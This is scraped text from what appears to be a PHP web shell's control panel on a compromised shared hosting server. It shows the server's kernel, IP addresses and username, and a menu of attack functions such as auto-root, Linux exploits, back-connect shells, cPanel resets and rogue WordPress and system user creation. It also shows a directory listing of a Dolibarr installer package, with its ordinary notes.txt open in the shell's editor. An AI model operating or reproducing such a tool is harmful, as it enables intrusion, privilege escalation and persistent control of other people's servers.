Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 3.147.89.50
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
dolibarr /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
changelog.txt
6.02
KB
-rw-r--r--
clone.php
6.09
KB
-rw-r--r--
conf.php
1.68
KB
-rw-r--r--
data.zip
1.35
MB
-rw-r--r--
dolibarr.sql
552.57
KB
-rw-r--r--
dolibarr.zip
75.66
MB
-rw-r--r--
edit.php
7.07
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
extend.php
2.26
KB
-rw-r--r--
fileindex.php
820
B
-rw-r--r--
import.php
3.43
KB
-rw-r--r--
info.xml
2.32
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
6.14
KB
-rw-r--r--
install.xml
2.45
KB
-rw-r--r--
md5
1.21
KB
-rw-r--r--
notes.txt
2.38
KB
-rw-r--r--
update_pass.php
148
B
-rw-r--r--
upgrade.php
5.72
KB
-rw-r--r--
upgrade.xml
289
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : notes.txt
1) Do not provide Username Pass for "Database server - Superuser access" while manual installation. (Not needed now) 2) For data.zip, Zip all the contents from "Documents" folder which installer has ask to create while manual installation. 3) Make it with mysqli not with mysql. 4) Do check "conf.php.example" and "conf.php.old" files for any changes in manual package. 5) PHP REQUIREMENT LINK: https://wiki.dolibarr.org/index.php/Prerequisites and /install/check.php under $arrayphpminversionwarning (it's PHP 7.1.0), it checks for the same while install as well, mentioned in 18.0.0 changelog as well. 6) Uncheck 'Make an anonymous Ping '+1' to the Dolibarr foundation server' option while manual installation. 7) Keep `flagdelsessionsbefore` value NULL in "user" table as it restricts multiple session logins.(Confirmed with vendor over email) 8) Post upgrading from 6.0.5 to 7.0.0, table "facturedet_rec_extrafields" and table "facture_rec_extrafields" are not generated. He will fix it in next version as they are not used in this version. (Confirmed with vendor via email.) Table "facture_rec_extrafields" is created in 7.0.1, Table "facturedet_rec_extrafields" is still remaining. This is from 6.0.5 to 7.0.x commande_fournisseur_dispatch_extrafields table emailcollector_emailcollectorfilter --- rulevalue` varchar(128) DEFAULT NULL, ALTER TABLE `[[dbprefix]]commande_fournisseur_dispatch ALTER TABLE `[[dbprefix]]reception 9) Don't exclude the install folder in install.xml, as it is required for features that are installed dynamically on demand of new dynamic features and excluding this directory breaks those. (On vendor request over email). We have already added install.lock file already to softdatadir i.e swrite($__settings['softdatadir'].'/install.lock', '', 1); to prevent accidental installation, as specified in docs. (Since 16.0.1) 10) Important : In .sql file, under `[[dbprefix]]const` table we have explicitly added (54, 'MAIN_LANG_DEFAULT', 1, '[[language]]', 'chaine', 0, '', '[[regtime]]'); and adjusted AUTO_INCREMENT accordingly , this is to enable language. Since 18.0.0 this entry is not created now while installation . It's created post language change. Check and copy this accordingly in every version. 11) Keep database port blank while manual installation. This would keep entry '$dolibarr_main_db_port = '0';' in conf/conf.php and Dolibarr would automatically detect db port.(Added in 20.0.1)
Close